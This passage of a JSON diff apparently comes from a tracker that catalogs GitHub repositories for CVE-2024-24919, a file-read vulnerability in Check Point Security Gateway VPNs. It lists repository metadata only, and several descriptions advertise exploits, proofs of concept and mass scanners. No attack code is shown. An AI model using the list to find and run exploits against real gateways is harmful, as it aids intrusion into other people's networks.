"has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808610745, + "name": "CVE-2024-24919-nuclei-templater", + "full_name": "smackerdodi\/CVE-2024-24919-nuclei-templater", + "owner": { + "login": "smackerdodi", + "id": 36116795, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36116795?v=4", + "html_url": "https:\/\/github.com\/smackerdodi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/smackerdodi\/CVE-2024-24919-nuclei-templater", + "description": "Nuclei template for CVE-2024-24919 ", + "fork": false, + "created_at": "2024-05-31T12:33:34Z", + "updated_at": "2024-06-10T03:36:49Z", + "pushed_at": "2024-05-31T12:35:30Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808625857, + "name": "CVE-2024-24919", + "full_name": "GoatSecurity\/CVE-2024-24919", + "owner": { + "login": "GoatSecurity", + "id": 153397256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153397256?v=4", + "html_url": "https:\/\/github.com\/GoatSecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GoatSecurity\/CVE-2024-24919", + "description": "CVE-2024-24919 exploit", + "fork": false, + "created_at": "2024-05-31T13:11:40Z", + "updated_at": "2024-11-19T00:56:22Z", + "pushed_at": "2024-05-31T15:50:57Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808722851, + "name": "CVE-2024-24919", + "full_name": "GlobalsecureAcademy\/CVE-2024-24919", + "owner": { + "login": "GlobalsecureAcademy", + "id": 30742368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30742368?v=4", + "html_url": "https:\/\/github.com\/GlobalsecureAcademy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GlobalsecureAcademy\/CVE-2024-24919", + "description": "Exploit tool to validate CVE-2024-24919 vulnerability on Checkpoint Firewall VPNs", + "fork": false, + "created_at": "2024-05-31T17:14:48Z", + "updated_at": "2024-06-07T05:01:41Z", + "pushed_at": "2024-05-31T17:31:32Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808733143, + "name": "CVE-2024-24919", + "full_name": "nexblade12\/CVE-2024-24919", + "owner": { + "login": "nexblade12", + "id": 168243165, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168243165?v=4", + "html_url": "https:\/\/github.com\/nexblade12", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nexblade12\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-05-31T17:41:08Z", + "updated_at": "2024-06-02T01:37:00Z", + "pushed_at": "2024-05-31T17:51:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808745521, + "name": "CVE-2024-24919", + "full_name": "un9nplayer\/CVE-2024-24919", + "owner": { + "login": "un9nplayer", + "id": 75741506, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75741506?v=4", + "html_url": "https:\/\/github.com\/un9nplayer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/un9nplayer\/CVE-2024-24919", + "description": "This repository contains a proof-of-concept (PoC) exploit for CVE-2024-24919, a critical vulnerability discovered in Check Point SVN. The vulnerability allows for reading system files. CVE ID: CVE-2024-24919", + "fork": false, + "created_at": "2024-05-31T18:14:19Z", + "updated_at": "2024-10-17T16:04:20Z", + "pushed_at": "2024-06-05T16:13:51Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808815211, + "name": "CVE-2024-24919", + "full_name": "0xkalawy\/CVE-2024-24919", + "owner": { + "login": "0xkalawy", + "id": 31960035, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31960035?v=4", + "html_url": "https:\/\/github.com\/0xkalawy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xkalawy\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-05-31T22:07:21Z", + "updated_at": "2024-05-31T23:39:55Z", + "pushed_at": "2024-05-31T23:39:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808853728, + "name": "CVE-2024-24919", + "full_name": "Cappricio-Securities\/CVE-2024-24919", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-24919", + "description": "Check Point Security Gateway (LFI)", + "fork": false, + "created_at": "2024-06-01T01:33:00Z", + "updated_at": "2024-06-24T10:03:27Z", + "pushed_at": "2024-06-24T10:02:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "check-point-security-gateway", + "cve-2024-24919", + "cve-2024-24919-exploit", + "cve-2024-24919-lfi", + "cve-2024-24919-poc", + "cve-2024-24919-scanner", + "information-disclosure", + "lfi", + "path-traversal" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 808862082, + "name": "CVE-2024-24919", + "full_name": "fernandobortotti\/CVE-2024-24919", + "owner": { + "login": "fernandobortotti", + "id": 61474323, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61474323?v=4", + "html_url": "https:\/\/github.com\/fernandobortotti", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fernandobortotti\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-06-01T02:20:28Z", + "updated_at": "2024-06-19T18:40:50Z", + "pushed_at": "2024-06-01T03:44:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808870264, + "name": "CVE-2024-24919", + "full_name": "nicolvsrlr27\/CVE-2024-24919", + "owner": { + "login": "nicolvsrlr27", + "id": 62434396, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62434396?v=4", + "html_url": "https:\/\/github.com\/nicolvsrlr27", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nicolvsrlr27\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-06-01T03:05:35Z", + "updated_at": "2024-06-01T03:05:35Z", + "pushed_at": "2024-06-01T03:05:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808874379, + "name": "CVE-2024-24919", + "full_name": "gurudattch\/CVE-2024-24919", + "owner": { + "login": "gurudattch", + "id": 119776344, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119776344?v=4", + "html_url": "https:\/\/github.com\/gurudattch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gurudattch\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-06-01T03:26:29Z", + "updated_at": "2024-08-05T11:14:22Z", + "pushed_at": "2024-06-01T05:56:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808967131, + "name": "CVE-2024-24919", + "full_name": "YN1337\/CVE-2024-24919", + "owner": { + "login": "YN1337", + "id": 88143447, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88143447?v=4", + "html_url": "https:\/\/github.com\/YN1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YN1337\/CVE-2024-24919", + "description": "Mass scanner for CVE-2024-24919", + "fork": false, + "created_at": "2024-06-01T09:54:13Z", + "updated_at": "2024-06-01T10:07:55Z", + "pushed_at": "2024-06-01T10:07:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808982882, + "name": "CVE-2024-24919-Bulk-Scanner", + "full_name": "ifconfig-me\/CVE-2024-24919-Bulk-Scanner", + "owner": { + "login": "ifconfig-me", + "id": 25315805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25315805?v=4", + "html_url": "https:\/\/github.com\/ifconfig-me", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ifconfig-me\/CVE-2024-24919-Bulk-Scanner", + "description": "CVE-2024-24919 [Check Point Security Gateway Information Disclosure]", + "fork": false, + "created_at": "2024-06-01T10:51:14Z", + "updated_at": "2024-11-18T06:27:33Z", + "pushed_at": "2024-06-02T06:36:57Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 30, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 809000136, + "name": "CVE-2024-24919-Checkpoint-Firewall-VPN-Check", + "full_name": "r4p3c4\/CVE-2024-24919-Checkpoint-Firewall-VPN-Check", + "owner": { + "login": "r4p3c4", + "id": 111358086, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111358086?v=4", + "html_url": "https:\/\/github.com\/r4p3c4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r4p3c4\/CVE-2024-24919-Checkpoint-Firewall-VPN-Check", + "description": "Esta herramienta se utiliza para validar la vulnerabilidad CVE-2024-24919 en las VPN de Checkpoint Firewall", + "fork": false, + "created_at": "2024-06-01T11:54:39Z", + "updated_at": "2024-06-01T11:59:15Z", + "pushed_at": "2024-06-01T11:56:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809002220, + "name": "CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN", + "full_name": "r4p3c4\/CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN", + "owner": { + "login": "r4p3c4", + "id": 111358086, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111358086?v=4", + "html_url": "https:\/\/github.com\/r4p3c4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r4p3c4\/CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN", + "description": "Herramienta de explotación para explotar la vulnerabilidad CVE-2024-24919 en las VPN de Checkpoint Firewall", + "fork": false, + "created_at": "2024-06-01T12:02:43Z", + "updated_at": "2024-06-03T19:27:04Z", + "pushed_at": "2024-06-01T12:20:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809246469, + "name": "CVE-2024-24919-CHECKPOINT", + "full_name": "J4F9S5D2Q7\/CVE-2024-24919-CHECKPOINT", + "owner": { + "login": "J4F9S5D2Q7", + "id": 171471588, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171471588?v=4", + "html_url": "https:\/\/github.com\/J4F9S5D2Q7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/J4F9S5D2Q7\/CVE-2024-24919-CHECKPOINT", + "description": null, + "fork": false, + "created_at": "2024-06-02T06:17:06Z", + "updated_at": "2024-06-09T22:34:29Z", + "pushed_at": "2024-06-02T07:19:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809275692, + "name": "CVE-2024-24919-Exploit", + "full_name": "mr-kasim-mehar\/CVE-2024-24919-Exploit", + "owner": { + "login": "mr-kasim-mehar", + "id": 136003436, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136003436?v=4", + "html_url": "https:\/\/github.com\/mr-kasim-mehar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mr-kasim-mehar\/CVE-2024-24919-Exploit", + "description": null, + "fork": false, + "created_at": "2024-06-02T08:19:50Z", + "updated_at": "2024-09-15T08:14:14Z", + "pushed_at": "2024-06-02T08:24:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809355149, + "name": "CVE-2024-24919-POC", + "full_name": "B1naryo\/CVE-2024-24919-POC", + "owner": { + "login": "B1naryo", + "id": 16160577, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16160577?v=4", + "html_url": "https:\/\/github.com\/B1naryo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/B1naryo\/CVE-2024-24919-POC", + "description": null, + "fork": false, + "created_at": "2024-06-02T13:09:51Z", + "updated_at": "2024-06-02T13:18:27Z", + "pushed_at": "2024-06-02T13:18:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809370211, + "name": "CVE-2024-24919---Poc", + "full_name": "Expl0itD0g\/CVE-2024-24919---Poc", + "owner": { + "login": "Expl0itD0g", + "id": 170868461, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170868461?v=4", + "html_url": "https:\/\/github.com\/Expl0itD0g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Expl0itD0g\/CVE-2024-24919---Poc", + "description": "a Proof of Concept of CVE-2024-24919", + "fork": false, + "created_at": "2024-06-02T13:58:36Z", + "updated_at": "2024-06-03T19:58:18Z", + "pushed_at": "2024-06-02T14:00:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809483907, + "name": "CVE-2024-24919-Sniper", + "full_name": "bigb0x\/CVE-2024-24919-Sniper", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-24919-Sniper", + "description": "CVE-2024-24919 Sniper - A powerful tool for scanning Check Point Security Gateway CVE-2024-24919 vulnerability. Supports single & bulk scanning, multithreading, and generates detailed CSV reports. Ideal for penetration testers and security researchers.", + "fork": false, + "created_at": "2024-06-02T20:16:22Z", + "updated_at": "2024-06-03T23:56:17Z", + "pushed_at": "2024-06-02T23:00:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809679765, + "name": "cve-2024-24919-checker", + "full_name": "birdlex\/cve-2024-24919-checker", + "owner": { + "login": "birdlex", + "id": 3228984, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3228984?v=4", + "html_url": "https:\/\/github.com\/birdlex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/birdlex\/cve-2024-24919-checker", + "description": null, + "fork": false, + "created_at": "2024-06-03T08:39:09Z", + "updated_at": "2024-06-04T06:54:59Z", + "pushed_at": "2024-06-04T06:54:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809769497, + "name": "CVE-2024-24919-Exploit", + "full_name": "Rug4lo\/CVE-2024-24919-Exploit", + "owner": { + "login": "Rug4lo", + "id": 123998963, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123998963?v=4", + "html_url": "https:\/\/github.com\/Rug4lo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rug4lo\/CVE-2024-24919-Exploit", + "description": " CVE-2024-24919 Exploit and PoC - Critical LFI for Remote Access VPN or Mobile Access.", + "fork": false, + "created_at": "2024-06-03T12:18:35Z", + "updated_at": "2024-06-24T12:34:39Z", + "pushed_at": "2024-06-03T14:09:22Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-24919" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809802562, + "name": "CVE-2024-24919-PoC", + "full_name": "0nin0hanz0\/CVE-2024-24919-PoC", + "owner": { + "login": "0nin0hanz0", + "id": 154326653, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154326653?v=4", + "html_url": "https:\/\/github.com\/0nin0hanz0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0nin0hanz0\/CVE-2024-24919-PoC", + "description": null, + "fork": false, + "created_at": "2024-06-03T13:30:31Z", + "updated_at": "2024-10-03T05:17:54Z", + "pushed_at": "2024-07-27T12:46:44Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809932050, + "name": "CVE-2024-24919", + "full_name": "GuayoyoCyber\/CVE-2024-24919", + "owner": { + "login": "GuayoyoCyber", + "id": 17362318, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17362318?v=4", + "html_url": "https:\/\/github.com\/GuayoyoCyber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GuayoyoCyber\/CVE-2024-24919", + "description": "Nmap script to check vulnerability CVE-2024-24919", + "fork": false, + "created_at": "2024-06-03T18:17:45Z", + "updated_at": "2024-11-06T12:30:51Z", + "pushed_at": "2024-06-04T01:38:40Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-24919", + "nmap", + "nmap-scripts" + ], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810087759, + "name": "CVE-2024-24919", + "full_name": "0xans\/CVE-2024-24919", + "owner": { + "login": "0xans", + "id": 151745138, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151745138?v=4", + "html_url": "https:\/\/github.com\/0xans", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xans\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-06-04T02:53:22Z", + "updated_at": "2024-07-01T17:39:46Z", + "pushed_at": "2024-06-19T16:59:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810112875, + "name": "CVE-2024-24919", + "full_name": "Tim-Hoekstra\/CVE-2024-24919", + "owner": { + "login": "Tim-Hoekstra", + "id": 135951177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135951177?v=4", + "html_url": "https:\/\/github.com\/Tim-Hoekstra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tim-Hoekstra\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-06-04T04:29:35Z", + "updated_at": "2024-06-04T04:58:59Z", + "pushed_at": "2024-06-04T04:58:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811447878, + "name": "CVE-2024-24919-POC", + "full_name": "starlox0\/CVE-2024-24919-POC", + "owner": { + "login": "starlox0", + "id": 144545235, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144545235?v=4", + "html_url": "https:\/\/github.com\/starlox0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/starlox0\/CVE-2024-24919-POC", + "description": "A Simple Exploit Code(POC) to Automate CVE-2024–24919", + "fork": false, + "created_at": "2024-06-06T16:03:35Z", + "updated_at": "2024-06-06T16:15:06Z", + "pushed_at": "2024-06-06T16:12:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811842021, + "name": "CVE-2024-24919-Exploit", + "full_name": "nullcult\/CVE-2024-24919-Exploit", + "owner": { + "login": "nullcult", + "id": 63312212, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63312212?v=4", + "html_url": "https:\/\/github.com\/nullcult", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nullcult\/CVE-2024-24919-Exploit", + "description": "CVE-2024-24919 exploit that checks more files for better visibility", + "fork": false, + "created_at": "2024-06-07T12:14:19Z", + "updated_at": "2024-06-07T12:25:37Z", + "pushed_at": "2024-06-07T12:25:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812235899, + "name": "cve-2024-24919", + "full_name": "satchhacker\/cve-2024-24919", + "owner": { + "login": "satchhacker", + "id": 171741472, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171741472?v=4", + "html_url": "https:\/\/github.com\/satchhacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/satchhacker\/cve-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-06-08T10:17:00Z", + "updated_at": "2024-06-08T10:26:37Z", + "pushed_at": "2024-06-08T10:26:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812532137, + "name": "CVE-2024-24919", + "full_name": "verylazytech\/CVE-2024-24919", + "owner": { + "login": "verylazytech", + "id": 172168670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172168670?v=4", + "html_url": "https:\/\/github.com\/verylazytech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/verylazytech\/CVE-2024-24919", + "description": "POC - CVE-2024–24919 - Check Point Security Gateways", + "fork": false, + "created_at": "2024-06-09T06:54:51Z", + "updated_at": "2024-11-26T21:34:45Z", + "pushed_at": "2024-11-26T14:45:44Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "check-point", + "cve-2024-24919", + "information-disclosure", + "poc-cve-2024-24919" + ], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812836186, + "name": "CVE-2024-24919", + "full_name": "protonnegativo\/CVE-2024-24919", + "owner": { + "login": "protonnegativo", + "id": 64793570, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64793570?v=4", + "html_url": "https:\/\/github.com\/protonnegativo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/protonnegativo\/CVE-2024-24919", + "description": "Python script to automate the process of finding vulnerable sites for CVE-2024-24919.", + "fork": false, + "created_at": "2024-06-10T01:29:19Z", + "updated_at": "2024-10-29T13:25:51Z", + "pushed_at": "2024-06-10T01:40:02Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-24919", + "cve-2024-24919-poc", + "python", + "security", + "security-automation", + "security-tools" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 813414695, + "name": "CVE-2024-24919", + "full_name": "SalehLardhi\/CVE-2024-24919", + "owner": { + "login": "SalehLardhi", + "id": 77610128, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77610128?v=4", + "html_url": "https:\/\/github.com\/SalehLardhi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SalehLardhi\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-06-11T03:33:30Z", + "updated_at": "2024-06-11T03:43:24Z", + "pushed_at": "2024-06-11T03:37:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 828696142, + "name": "CVE-2024-24919", + "full_name": "ShadowByte1\/CVE-2024-24919", + "owner": { + "login": "ShadowByte1", + "id": 155693555, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155693555?v=4", + "html_url": "https:\/\/github.com\/ShadowByte1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShadowByte1\/CVE-2024-24919", + "description": null, + "fork": false, + "created_at": "2024-07-14T23:26:51Z", + "updated_at": "2024-07-14T23:33:02Z", + "pushed_at": "2024-07-14T23:33:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 831985405, + "name": "CVE-2024-24919", + "full_name": "H3KEY\/CVE-2024-24919", + "owner": { + "login": "H3KEY", + "id": 176267746, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176267746?v=4", + "html_url": "https:\/\/github.com\/H3KEY", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/H3KEY\/CVE-2024-24919", + "description": "Hello everyone, I am sharing a modified script from CVE-2024-24919 which can extract paths categorized as critical.", + "fork": false, + "created_at": "2024-07-22T06:04:13Z", + "updated_at": "2024-07-22T06:07:47Z", + "pushed_at": "2024-07-22T06:07:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 834172359, + "name": "cve-2024-24919", + "full_name": "Jutrm\/cve-2024-24919", + "owner": { + "login": "Jutrm", + "id": 84643295, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84643295?v=4", + "html_url": "https:\/\/github.com\/Jutrm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jutrm\/cve-2024-24919", + "description": null, + "fork": false, + "created_at": 